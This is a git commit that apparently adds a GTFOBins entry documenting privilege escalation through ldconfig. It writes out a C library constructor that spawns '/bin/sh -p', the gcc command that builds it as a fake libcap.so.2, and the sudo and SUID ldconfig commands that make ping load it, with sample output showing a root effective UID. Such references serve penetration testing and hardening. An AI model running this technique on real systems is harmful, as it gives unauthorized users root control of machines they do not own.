Add ldconfig

Close #68.
2025-10-31 16:58:36 +01:00 · 2019-08-14 13:13:11 +02:00
parent f68a3ce009
commit 391d436fc5
1 changed files with 54 additions and 0 deletions
--- a/_gtfobins/ldconfig.md
+++ b/_gtfobins/ldconfig.md
@@ -0,0 +1,54 @@
+---
+description: |
+  Follows a minimal example of how to use the described technique (details may change across different distributions).
+
+  Run the code associated with the technique.
+
+  Identify a target SUID executable, for example the `libcap` library of `ping`:
+
+  ```
+  $ ldd /bin/ping | grep libcap
+        libcap.so.2 => /tmp/tmp.9qfoUyKaGu/libcap.so.2 (0x00007fc7e9797000)
+  ```
+
+  Create a fake library that spawns a shell at bootstrap:
+
+  ```
+  echo '#include <unistd.h>
+
+  __attribute__((constructor))
+  static void init() {
+      execl("/bin/sh", "/bin/sh", "-p", NULL);
+  }
+  ' >"$TF/lib.c"
+  ```
+
+  Compile it with:
+
+  ```
+  gcc -fPIC -shared "$TF/lib.c" -o "$TF/libcap.so.2"
+  ```
+
+  Run `ldconfig` again as described below then just run `ping` to obtain a root shell:
+
+  ```
+  $ ping
+  # id
+  uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)
+  ```
+functions:
+  sudo:
+    - description: This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries.
+      code: |
+        TF=$(mktemp -d)
+        echo "$TF" > "$TF/conf"
+        # move malicious libraries in $TF
+        sudo ldconfig -f "$TF/conf"
+  limited-suid:
+    - description: This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries.
+      code: |
+        TF=$(mktemp -d)
+        echo "$TF" > "$TF/conf"
+        # move malicious libraries in $TF
+        ./ldconfig -f "$TF/conf"
+---